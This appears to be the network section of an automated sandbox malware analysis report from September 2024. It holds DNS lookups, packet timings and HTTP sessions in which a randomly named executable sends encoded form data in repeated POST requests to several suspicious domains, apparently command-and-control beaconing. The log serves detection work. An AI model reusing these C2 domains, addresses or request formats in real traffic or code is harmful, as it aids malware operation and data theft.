                                        Sep 27, 2024 06:37:05.273209095 CEST5498080192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:05.286014080 CEST5498080192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:05.290880919 CEST80549803.33.130.190192.168.2.7
                                        Sep 27, 2024 06:37:05.757775068 CEST80549803.33.130.190192.168.2.7
                                        Sep 27, 2024 06:37:05.757869005 CEST80549803.33.130.190192.168.2.7
                                        Sep 27, 2024 06:37:05.760551929 CEST5498080192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:05.809705973 CEST5498080192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:05.814713955 CEST80549803.33.130.190192.168.2.7
                                        Sep 27, 2024 06:37:10.859147072 CEST5498180192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:10.864077091 CEST805498134.76.205.124192.168.2.7
                                        Sep 27, 2024 06:37:10.865916967 CEST5498180192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:10.877783060 CEST5498180192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:10.882673025 CEST805498134.76.205.124192.168.2.7
                                        Sep 27, 2024 06:37:11.483444929 CEST805498134.76.205.124192.168.2.7
                                        Sep 27, 2024 06:37:11.483520985 CEST805498134.76.205.124192.168.2.7
                                        Sep 27, 2024 06:37:11.483803988 CEST5498180192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:12.421020031 CEST5498180192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:13.441030025 CEST5498280192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:13.445990086 CEST805498234.76.205.124192.168.2.7
                                        Sep 27, 2024 06:37:13.446139097 CEST5498280192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:13.458482981 CEST5498280192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:13.463319063 CEST805498234.76.205.124192.168.2.7
                                        Sep 27, 2024 06:37:14.082459927 CEST805498234.76.205.124192.168.2.7
                                        Sep 27, 2024 06:37:14.082557917 CEST805498234.76.205.124192.168.2.7
                                        Sep 27, 2024 06:37:14.082621098 CEST5498280192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:14.968509912 CEST5498280192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:17.252645016 CEST5498380192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:17.257487059 CEST805498334.76.205.124192.168.2.7
                                        Sep 27, 2024 06:37:17.257638931 CEST5498380192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:17.270239115 CEST5498380192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:17.275059938 CEST805498334.76.205.124192.168.2.7
                                        Sep 27, 2024 06:37:17.275186062 CEST805498334.76.205.124192.168.2.7
                                        Sep 27, 2024 06:37:17.893306971 CEST805498334.76.205.124192.168.2.7
                                        Sep 27, 2024 06:37:17.893363953 CEST805498334.76.205.124192.168.2.7
                                        Sep 27, 2024 06:37:17.893518925 CEST5498380192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:18.781035900 CEST5498380192.168.2.734.76.205.124
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2024 06:34:41.506369114 CEST | 53 | 63021 | 162.159.36.2 | 192.168.2.7
Sep 27, 2024 06:34:42.001785040 CEST | 61236 | 53 | 192.168.2.7 | 1.1.1.1
Sep 27, 2024 06:34:42.010407925 CEST | 53 | 61236 | 1.1.1.1 | 192.168.2.7
Sep 27, 2024 06:34:49.432879925 CEST | 60172 | 53 | 192.168.2.7 | 1.1.1.1
Sep 27, 2024 06:34:49.443682909 CEST | 53 | 60172 | 1.1.1.1 | 192.168.2.7
Sep 27, 2024 06:34:54.455797911 CEST | 63217 | 53 | 192.168.2.7 | 1.1.1.1
Sep 27, 2024 06:34:54.673072100 CEST | 53 | 63217 | 1.1.1.1 | 192.168.2.7
Sep 27, 2024 06:35:15.863442898 CEST | 61321 | 53 | 192.168.2.7 | 1.1.1.1
Sep 27, 2024 06:35:15.877310038 CEST | 53 | 61321 | 1.1.1.1 | 192.168.2.7
Sep 27, 2024 06:35:29.191807985 CEST | 52603 | 53 | 192.168.2.7 | 1.1.1.1
Sep 27, 2024 06:35:29.814960003 CEST | 53 | 52603 | 1.1.1.1 | 192.168.2.7
Sep 27, 2024 06:36:03.879165888 CEST | 49315 | 53 | 192.168.2.7 | 1.1.1.1
Sep 27, 2024 06:36:03.890512943 CEST | 53 | 49315 | 1.1.1.1 | 192.168.2.7
Sep 27, 2024 06:36:17.019195080 CEST | 54864 | 53 | 192.168.2.7 | 1.1.1.1
Sep 27, 2024 06:36:17.037295103 CEST | 53 | 54864 | 1.1.1.1 | 192.168.2.7
Sep 27, 2024 06:36:30.253741980 CEST | 59168 | 53 | 192.168.2.7 | 1.1.1.1
Sep 27, 2024 06:36:30.267168045 CEST | 53 | 59168 | 1.1.1.1 | 192.168.2.7
Sep 27, 2024 06:36:43.457740068 CEST | 64916 | 53 | 192.168.2.7 | 1.1.1.1
Sep 27, 2024 06:36:43.479055882 CEST | 53 | 64916 | 1.1.1.1 | 192.168.2.7
Sep 27, 2024 06:36:57.128874063 CEST | 65205 | 53 | 192.168.2.7 | 1.1.1.1
Sep 27, 2024 06:36:57.142177105 CEST | 53 | 65205 | 1.1.1.1 | 192.168.2.7
Sep 27, 2024 06:37:10.817800999 CEST | 49398 | 53 | 192.168.2.7 | 1.1.1.1
Sep 27, 2024 06:37:10.854064941 CEST | 53 | 49398 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 27, 2024 06:34:42.001785040 CEST | 192.168.2.7 | 1.1.1.1 | 0x9468 | Standard query (0) | 18.31.95.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Sep 27, 2024 06:34:49.432879925 CEST | 192.168.2.7 | 1.1.1.1 | 0xf960 | Standard query (0) | www.48vlu.shop | A (IP address) | IN (0x0001) | false
Sep 27, 2024 06:34:54.455797911 CEST | 192.168.2.7 | 1.1.1.1 | 0xf9a5 | Standard query (0) | www.antura.partners | A (IP address) | IN (0x0001) | false
Sep 27, 2024 06:35:15.863442898 CEST | 192.168.2.7 | 1.1.1.1 | 0x75cb | Standard query (0) | www.skystargazeguide.store | A (IP address) | IN (0x0001) | false
Sep 27, 2024 06:35:29.191807985 CEST | 192.168.2.7 | 1.1.1.1 | 0x87bc | Standard query (0) | www.nmh6.site | A (IP address) | IN (0x0001) | false
Sep 27, 2024 06:36:03.879165888 CEST | 192.168.2.7 | 1.1.1.1 | 0xd01 | Standard query (0) | www.sapatarias.online | A (IP address) | IN (0x0001) | false
Sep 27, 2024 06:36:17.019195080 CEST | 192.168.2.7 | 1.1.1.1 | 0x8c1 | Standard query (0) | www.softillery.info | A (IP address) | IN (0x0001) | false
Sep 27, 2024 06:36:30.253741980 CEST | 192.168.2.7 | 1.1.1.1 | 0xa1d9 | Standard query (0) | www.asiapartnars.online | A (IP address) | IN (0x0001) | false
Sep 27, 2024 06:36:43.457740068 CEST | 192.168.2.7 | 1.1.1.1 | 0xc415 | Standard query (0) | www.priunit.online | A (IP address) | IN (0x0001) | false
Sep 27, 2024 06:36:57.128874063 CEST | 192.168.2.7 | 1.1.1.1 | 0xf759 | Standard query (0) | www.consultarfacil.online | A (IP address) | IN (0x0001) | false
Sep 27, 2024 06:37:10.817800999 CEST | 192.168.2.7 | 1.1.1.1 | 0x3fd6 | Standard query (0) | www.exhibitarrange.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 27, 2024 06:34:42.010407925 CEST | 1.1.1.1 | 192.168.2.7 | 0x9468 | Name error (3) | 18.31.95.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Sep 27, 2024 06:34:49.443682909 CEST | 1.1.1.1 | 192.168.2.7 | 0xf960 | Name error (3) | www.48vlu.shop | none | none | A (IP address) | IN (0x0001) | false
Sep 27, 2024 06:34:54.673072100 CEST | 1.1.1.1 | 192.168.2.7 | 0xf9a5 | No error (0) | www.antura.partners | | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 06:35:15.877310038 CEST | 1.1.1.1 | 192.168.2.7 | 0x75cb | No error (0) | www.skystargazeguide.store | | 38.180.87.102 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 06:35:29.814960003 CEST | 1.1.1.1 | 192.168.2.7 | 0x87bc | No error (0) | www.nmh6.site | | 43.154.104.247 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 06:36:03.890512943 CEST | 1.1.1.1 | 192.168.2.7 | 0xd01 | No error (0) | www.sapatarias.online | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 06:36:03.890512943 CEST | 1.1.1.1 | 192.168.2.7 | 0xd01 | No error (0) | www.sapatarias.online | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 06:36:17.037295103 CEST | 1.1.1.1 | 192.168.2.7 | 0x8c1 | No error (0) | www.softillery.info | softillery.info | | CNAME (Canonical name) | IN (0x0001) | false
Sep 27, 2024 06:36:17.037295103 CEST | 1.1.1.1 | 192.168.2.7 | 0x8c1 | No error (0) | softillery.info | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 06:36:17.037295103 CEST | 1.1.1.1 | 192.168.2.7 | 0x8c1 | No error (0) | softillery.info | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 06:36:30.267168045 CEST | 1.1.1.1 | 192.168.2.7 | 0xa1d9 | No error (0) | www.asiapartnars.online | asiapartnars.online | | CNAME (Canonical name) | IN (0x0001) | false
Sep 27, 2024 06:36:30.267168045 CEST | 1.1.1.1 | 192.168.2.7 | 0xa1d9 | No error (0) | asiapartnars.online | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 06:36:30.267168045 CEST | 1.1.1.1 | 192.168.2.7 | 0xa1d9 | No error (0) | asiapartnars.online | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 06:36:43.479055882 CEST | 1.1.1.1 | 192.168.2.7 | 0xc415 | No error (0) | www.priunit.online | | 162.0.238.238 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 06:36:57.142177105 CEST | 1.1.1.1 | 192.168.2.7 | 0xf759 | No error (0) | www.consultarfacil.online | consultarfacil.online | | CNAME (Canonical name) | IN (0x0001) | false
Sep 27, 2024 06:36:57.142177105 CEST | 1.1.1.1 | 192.168.2.7 | 0xf759 | No error (0) | consultarfacil.online | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 06:36:57.142177105 CEST | 1.1.1.1 | 192.168.2.7 | 0xf759 | No error (0) | consultarfacil.online | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 06:37:10.854064941 CEST | 1.1.1.1 | 192.168.2.7 | 0x3fd6 | No error (0) | www.exhibitarrange.shop | | 34.76.205.124 | A (IP address) | IN (0x0001) | false
                                        • www.antura.partners
                                        • www.skystargazeguide.store
                                        • www.nmh6.site
                                        • www.sapatarias.online
                                        • www.softillery.info
                                        • www.asiapartnars.online
                                        • www.priunit.online
                                        • www.consultarfacil.online
                                        • www.exhibitarrange.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 54952 | 208.91.197.27 | 80 | 2340 | C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 06:34:54.691826105 CEST | 472 | OUT | GET /w2z7/?3h-p=N9vxY/BiH9CUPRIyAeGfJVJpgq7WjV4m4CgUXf3o6/BdznXYzsjphhYZEJkNcKLxLeXc17863lrPM6vanLJ7s3GZsr4LBR9+XIJ5iKj/YnCcrwekjQRW3tXz8P3xMqQF6fEDN8pz57Wi&yP=MxXHdlzpQrd0 HTTP/1.1
                                        Host: www.antura.partners
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-us
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
Sep 27, 2024 06:34:55.683835030 CEST | 1236 | IN | HTTP/1.1 200 OK
                                        Date: Fri, 27 Sep 2024 04:34:55 GMT
                                        Server: Apache
                                        Referrer-Policy: no-referrer-when-downgrade
                                        Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                        Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                        Set-Cookie: vsid=912vr474957295244191699; expires=Wed, 26-Sep-2029 04:34:55 GMT; Max-Age=157680000; path=/; domain=www.antura.partners; HttpOnly
                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_lR044jIWLsy9b3oVxSkVOQArV0J5x/yvjk6OLJMgl6T/C7QTVWEywIrc6K+17Dm7jmFf2kZIcSEbIk6f+4H2Tw==
                                        Content-Length: 2615
                                        Content-Type: text/html; charset=UTF-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 6c 52 30 34 34 6a 49 57 4c 73 79 39 62 33 6f 56 78 53 6b 56 4f 51 41 72 56 30 4a 35 78 2f 79 76 6a 6b 36 4f 4c 4a 4d 67 6c 36 54 2f 43 37 51 54 56 57 45 79 77 49 72 63 36 4b 2b 31 37 44 6d 37 6a 6d 46 66 32 6b 5a 49 63 53 45 62 49
                                        Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_lR044jIWLsy9b3oVxSkVOQArV0J5x/yvjk6OLJMgl6T/C7QTVWEywIrc6K+17Dm7jmFf2kZIcSEbI
                                         Sep 27, 2024 06:34:55.683855057 CEST | 1236 | IN | Data Raw: 6b 36 66 2b 34 48 32 54 77 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70
                                        Data Ascii: k6f+4H2Tw=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.antura.partners/px.js?ch=1"></script><script type="text/javascript" src="http://www.antura.partners/px.js?ch=2"></script><scr
                                         Sep 27, 2024 06:34:55.683870077 CEST | 255 | IN | Data Raw: 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f
                                        Data Ascii: ntent="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=devi
                                         Sep 27, 2024 06:34:55.684098959 CEST | 878 | IN | Data Raw: 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c
                                        Data Ascii: itial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"></head><body><div id="partner"></div><script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"'


                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                         1 | 192.168.2.7 | 54953 | 38.180.87.102 | 80 | 2340 | C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                         Timestamp | Bytes transferred | Direction | Data
                                         Sep 27, 2024 06:35:15.897653103 CEST | 759 | OUT | POST /jnnq/ HTTP/1.1
                                        Host: www.skystargazeguide.store
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.skystargazeguide.store
                                        Content-Length: 217
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.skystargazeguide.store/jnnq/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 41 6b 74 4f 48 32 66 37 36 4f 78 42 47 39 75 6a 53 68 4b 6a 4a 41 43 45 6e 41 53 34 61 50 41 62 41 56 67 75 54 42 43 49 76 55 67 31 64 68 45 58 64 4b 48 47 53 48 74 4e 33 6c 77 38 30 47 77 30 56 47 50 33 73 42 75 6e 47 65 31 61 4c 6f 68 4a 6a 35 72 46 46 4e 6a 52 56 71 48 48 66 4f 68 79 4f 56 63 55 51 34 4b 56 74 30 33 57 75 63 58 6d 6a 6b 64 6f 64 66 4d 6c 6d 45 34 4e 39 41 43 58 34 6d 6a 69 7a 2f 69 43 37 53 65 37 6a 55 70 7a 59 53 52 2b 32 36 79 57 72 30 65 31 4e 77 6e 41 6f 76 53 66 39 59 54 6f 4e 65 52 72 6e 6d 35 4f 4a 62 75 52 67 62 4b 65 74 43 6b 48 50 78 70 6d 6c 7a 56 36 48 6d 51 50 72 2f 44 70 63 36 6d 39 77 77 3d 3d
                                        Data Ascii: 3h-p=AktOH2f76OxBG9ujShKjJACEnAS4aPAbAVguTBCIvUg1dhEXdKHGSHtN3lw80Gw0VGP3sBunGe1aLohJj5rFFNjRVqHHfOhyOVcUQ4KVt03WucXmjkdodfMlmE4N9ACX4mjiz/iC7Se7jUpzYSR+26yWr0e1NwnAovSf9YToNeRrnm5OJbuRgbKetCkHPxpmlzV6HmQPr/Dpc6m9ww==
                                         Sep 27, 2024 06:35:16.508824110 CEST | 462 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Fri, 27 Sep 2024 04:35:16 GMT
                                        Content-Type: text/html; charset=iso-8859-1
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Content-Encoding: gzip
                                        Data Raw: 66 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f 83 40 10 85 ef fc 8a b1 27 3d b8 83 04 13 0f 9b 4d 6c a1 b1 09 56 62 e1 e0 71 eb 4e 0b b1 b2 b8 3b 48 ea af 77 a1 31 f1 32 c9 9b f9 de cb 1b 79 95 bd ac aa b7 32 87 a7 ea b9 80 b2 5e 16 9b 15 2c 6e 11 37 79 b5 46 cc aa ec 72 49 44 8c 98 6f 17 2a 92 0d 7f 9e 94 6c 48 9b 20 b8 e5 13 a9 34 4e 61 6b 19 d6 76 e8 8c c4 cb 32 92 38 43 72 6f cd 79 f2 dd a9 7f 4c 50 91 ec 55 d5 10 38 fa 1a c8 33 19 a8 5f 0b 18 b5 87 2e 70 87 89 03 db 01 37 ad 07 4f ee 9b 9c 90 d8 4f 49 2e 0c 6d 8c 23 ef d5 63 af df 1b c2 44 a4 e2 3e 81 eb 7a 3f 74 3c dc c0 6e 36 80 66 18 c7 51 f8 8f b3 67 ed 8e fa 87 8e 43 6b 48 78 b6 8e a0 b4 8e e1 21 96 f8 17 16 3a cf 6d 43 bf e9 cb e8 17 7b 68 f4 b3 20 01 00 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: f1MAO@'=MlVbqN;Hw12y2^,n7yFrIDo*lH 4Nakv28CroyLPU83_.p7OOI.m#cD>z?t<n6fQgCkHx!:mC{h 0


                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                         2 | 192.168.2.7 | 54954 | 38.180.87.102 | 80 | 2340 | C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                         Timestamp | Bytes transferred | Direction | Data
                                         Sep 27, 2024 06:35:18.448776960 CEST | 779 | OUT | POST /jnnq/ HTTP/1.1
                                        Host: www.skystargazeguide.store
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.skystargazeguide.store
                                        Content-Length: 237
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.skystargazeguide.store/jnnq/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 41 6b 74 4f 48 32 66 37 36 4f 78 42 47 65 32 6a 42 57 32 6a 64 51 43 62 2b 77 53 34 51 76 41 41 41 56 63 75 54 45 69 59 6f 68 51 31 59 7a 4d 58 63 4c 48 47 56 48 74 4e 39 46 77 35 36 6d 77 46 56 47 79 43 73 41 53 6e 47 65 68 61 4c 71 70 4a 69 4b 54 61 46 64 6a 66 64 4b 48 2f 53 75 68 79 4f 56 63 55 51 35 76 43 74 30 76 57 76 6f 72 6d 69 42 39 76 55 2f 4d 6d 6c 45 34 4e 33 51 43 54 34 6d 6a 45 7a 39 57 6f 37 55 43 37 6a 52 46 7a 59 44 52 39 34 36 79 51 6c 55 66 35 46 69 32 31 75 63 65 68 38 65 54 46 50 66 42 49 76 77 6b 73 54 35 69 39 2b 4b 79 6c 70 41 41 78 59 58 30 54 6e 79 52 69 4b 45 6b 75 30 49 6d 44 52 6f 48 35 6d 4b 53 34 52 42 42 6d 66 54 50 7a 4d 6c 73 6b 35 47 57 62 5a 72 38 3d
                                        Data Ascii: 3h-p=AktOH2f76OxBGe2jBW2jdQCb+wS4QvAAAVcuTEiYohQ1YzMXcLHGVHtN9Fw56mwFVGyCsASnGehaLqpJiKTaFdjfdKH/SuhyOVcUQ5vCt0vWvormiB9vU/MmlE4N3QCT4mjEz9Wo7UC7jRFzYDR946yQlUf5Fi21uceh8eTFPfBIvwksT5i9+KylpAAxYX0TnyRiKEku0ImDRoH5mKS4RBBmfTPzMlsk5GWbZr8=
                                         Sep 27, 2024 06:35:19.045104027 CEST | 462 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Fri, 27 Sep 2024 04:35:18 GMT
                                        Content-Type: text/html; charset=iso-8859-1
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Content-Encoding: gzip
                                        Data Raw: 66 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f 83 40 10 85 ef fc 8a b1 27 3d b8 83 04 13 0f 9b 4d 6c a1 b1 09 56 62 e1 e0 71 eb 4e 0b b1 b2 b8 3b 48 ea af 77 a1 31 f1 32 c9 9b f9 de cb 1b 79 95 bd ac aa b7 32 87 a7 ea b9 80 b2 5e 16 9b 15 2c 6e 11 37 79 b5 46 cc aa ec 72 49 44 8c 98 6f 17 2a 92 0d 7f 9e 94 6c 48 9b 20 b8 e5 13 a9 34 4e 61 6b 19 d6 76 e8 8c c4 cb 32 92 38 43 72 6f cd 79 f2 dd a9 7f 4c 50 91 ec 55 d5 10 38 fa 1a c8 33 19 a8 5f 0b 18 b5 87 2e 70 87 89 03 db 01 37 ad 07 4f ee 9b 9c 90 d8 4f 49 2e 0c 6d 8c 23 ef d5 63 af df 1b c2 44 a4 e2 3e 81 eb 7a 3f 74 3c dc c0 6e 36 80 66 18 c7 51 f8 8f b3 67 ed 8e fa 87 8e 43 6b 48 78 b6 8e a0 b4 8e e1 21 96 f8 17 16 3a cf 6d 43 bf e9 cb e8 17 7b 68 f4 b3 20 01 00 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: f1MAO@'=MlVbqN;Hw12y2^,n7yFrIDo*lH 4Nakv28CroyLPU83_.p7OOI.m#cD>z?t<n6fQgCkHx!:mC{h 0


                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                         3 | 192.168.2.7 | 54955 | 38.180.87.102 | 80 | 2340 | C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                         Timestamp | Bytes transferred | Direction | Data
                                         Sep 27, 2024 06:35:20.990653992 CEST | 1792 | OUT | POST /jnnq/ HTTP/1.1
                                        Host: www.skystargazeguide.store
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.skystargazeguide.store
                                        Content-Length: 1249
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.skystargazeguide.store/jnnq/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 41 6b 74 4f 48 32 66 37 36 4f 78 42 47 65 32 6a 42 57 32 6a 64 51 43 62 2b 77 53 34 51 76 41 41 41 56 63 75 54 45 69 59 6f 67 45 31 45 52 30 58 64 6f 2f 47 55 48 74 4e 2b 46 77 34 36 6d 77 59 56 47 71 4f 73 41 65 6f 47 64 5a 61 4b 50 6c 4a 32 72 54 61 57 39 6a 66 52 71 48 45 66 4f 68 6a 4f 56 4d 51 51 34 66 43 74 30 76 57 76 75 50 6d 30 6b 64 76 53 2f 4d 6c 6d 45 34 37 39 41 43 37 34 6d 37 36 7a 39 53 53 37 69 79 37 69 31 6c 7a 65 78 35 39 77 36 79 53 6f 30 65 6b 46 69 36 63 75 61 36 48 38 65 50 6a 50 64 52 49 2b 57 68 51 41 5a 71 71 70 4e 61 43 67 42 45 50 50 6e 38 6c 75 69 42 31 50 6b 73 2f 38 62 36 6b 63 49 75 77 77 76 6a 7a 42 68 74 4e 48 48 44 73 48 77 78 79 73 6c 36 71 48 73 6c 57 46 68 47 4b 66 35 4c 77 66 6a 38 6c 49 2f 63 4b 4c 34 75 54 35 64 77 48 42 71 43 4c 33 46 75 4d 4d 55 6d 2f 59 71 46 4e 37 6b 4b 53 6e 75 6a 7a 6f 78 78 46 70 43 59 6c 71 38 77 59 64 68 4d 36 75 65 2f 44 79 6a 61 51 33 30 71 34 38 76 46 73 30 64 33 73 39 68 68 79 50 47 51 33 77 6e 64 76 42 48 74 45 2f [TRUNCATED]
